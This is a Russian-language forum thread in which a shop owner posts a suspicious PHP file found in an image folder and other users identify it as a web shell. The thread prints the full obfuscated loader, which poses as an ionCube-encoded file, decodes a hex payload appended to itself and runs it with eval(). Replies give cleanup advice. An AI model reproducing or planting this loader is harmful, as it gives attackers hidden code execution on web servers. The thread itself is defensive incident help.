Сломали магазин или разработчик код зашифровал?

[Sigizmund]

Здравствуйте. Антивирусное серверное ПО нашло подозрительный php файл, его содержимое:

<?php //0002c1
if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');$__id = realpath('extension_dir');$__here = dirname(__FILE__);if (strlen($__id) > 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0xafd-0x64d)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;

?>
24626R37J2U7Ea20B3Vd2L0F41K727L2H6179E282A76a6c657327X3dQ3e2Q763U6CdN7H978O2
72N93b2472M7F46P5692H03d20M4B1727261O7I928W2O76fJ7a67726Ze27I3Yd3eP2B76D6Q6
B57I47aV702R72P9D3b666f7265R6R16P3G682028J4A1M72726J179K28H246U2X637F27a2c2
02T45Rf504f53D542LcT202P47274X65692cL202S45Kf434f4f4b4Z945292I061F73202469J
696UcD7Q1Z6275292S0X7b666f72X65U616368202824Q6D96W9N6c7162752X06173202N4647
3O75P63203d3e2024L717E274H63A2920Q7bA24J71J727L463203d20407061S63T6b2U82B24
X82DaA222Jc202T471727C4V63S293b246W473X7N56V3202e3Qd2J02T23E336R32316532T3L
5362d3B63462M3C52d34333C3302dG383P0W6236P2dX3A7E34336X13835L6V431I3N83A933K
61M223WbS247168U626J36Wd20C3Fd2024O7X17Y27B4N6B3X2I05eZ20737Q56F273T74R72S2
8A7374E725f7265706U56S1S7S42S8K24647375632c20C28E737R4726c6V56JeX2824B71727
4X63N29202SfF207374U7B2C6Kc6I56XeG2V82Z46N4737F5632929R20C2b20312J92c2030W2
Bc20737I47L26c656e2W824I717274632Y9293bJ2471O6H862S63O6d203d2R0P6Z5A78706Tc
C6fY6D46J5H2822T2V322T2cM2U0247S1T68W6263K6dB293b6S96F6Q20F2863G6f7I5A6Ae7T
42U82P4R716862R636d2E9203dW3d20X3329207bP6P576Q6J1Z6c28I2Z4A7S168626W36dB5b
315Od28247B1P686263B6Dd5b32V5d2929C3bY6578G69F742829U3b7dM7d7Fd

Путь тоже странный: site.ru/image/data/#U2018#U0490#U0430#U0401#U0401/qsvxpkwq.php

Много модулей на сайте, зашифрованных IonCube, вот думаю это может быть полезное что-то или точно phpShell какой-нибудь?

[Tom]

4 минуты назад, Sigizmund сказал:

/image/data/#U2018#U0490#U0430#U0401#U0401/qsvxpkwq.php

Это шелл....

[Sigizmund]

Там какие-то проверки идут на наличие файла и IonCube, если я его удалю вдруг отвалится что-нибудь?

[wbDev]

31 минуту назад, Sigizmund сказал:

Путь тоже странный: site.ru/image/data/#U2018#U0490#U0430#U0401#U0401/qsvxpkwq.php

Скиньте файл, а то в том коде выше после раскодировки ересь  если это он то еще поищите, должны быть

Тачнее там что-то от Вэнь Данг, не понимаю я китайский

Змінено 13 грудня 2018 користувачем wbDev

[Tom]

Файлы в папке с картинками и названиями qsvxpkwq.php , явно не файлы модуля или разработчика...Это скорее орудие взломщика и явно этот файл не одинок.

Здесь или наличие на одном хостинге не особо безопасных соседей типа WP или же случайно попавшийся в интернете модуль с сюрпризом от  того кто его выложил.

Остальное уже последствия не требующие зачастую даже участия человека.

[wbDev]

11 минут назад, Tom сказал:

явно не файлы модуля или разработчика

Это либо редиректер на сайт китов или рекламу показывает, не факт что на опене работать будет, часто видел аналоги заточенные на ВП, на опене просто были неактивные. Но срет он жестко. Чистить нудно его, мало того что своего накидывает, так еще и в файлы движка вписывается

[shoputils]

2 часа назад, Tom сказал:

Это шелл....

Я бы сказал, шелл, маскирующийся под закубированный файл.

[Sigizmund]

Потёр я эту гадость, магазин не упал, вроде всё в порядке. Всем спасибо!

[wbDev]

3 минуты назад, Sigizmund сказал:

Потёр я эту гадость, магазин не упал, вроде всё в порядке. Всем спасибо!

Это была не гадость, ищите еще

[Sigizmund]

6 минут назад, wbDev сказал:

Это была не гадость, ищите еще

У меня на сервере антивирусник не нашёл больше ничего

[wbDev]

9 минут назад, Sigizmund сказал:

У меня на сервере антивирусник не нашёл больше ничего

айболит хоть запустите

[sv2109]

если есть ssh доступ запустите в корне сайта команду 
"find -ctime -30 | grep '.php' > modified.txt"
она найдет (рекурсивно во всех подпапках) все файлы с расширением php, которые были изменены за последние 30 дней (или измените 30 на любое другое к-во дней если точно знаете когда это случилось) и запишет эти файлы в файл modified.txt 
потом можно будет проанализировать все эти файлы на наличие стороннего кода, так как почти всегда если есть сторонние файлы с шелами, то есть изменения и в существующих файлах напр. index.php и других. 

[Sigizmund]

28 минут назад, wbDev сказал:

айболит хоть запустите

У меня вот этот антивирусник, думаю не хуже? https://www.ispsystem.ru/addons-modules/imunifyav

28 минут назад, sv2109 сказал:

если есть ssh доступ запустите в корне сайта команду 
"find -ctime -30 | grep '.php' > modified.txt"
она найдет (рекурсивно во всех подпапках) все файлы с расширением php, которые были изменены за последние 30 дней (или измените 30 на любое другое к-во дней если точно знаете когда это случилось) и запишет эти файлы в файл modified.txt 
потом можно будет проанализировать все эти файлы на наличие стороннего кода, так как почти всегда если есть сторонние файлы с шелами, то есть изменения и в существующих файлах напр. index.php и других. 

Этот файл последний раз редактировался в 2016 году так что точно там не 30 дней.

[n3bo]

Ставьте git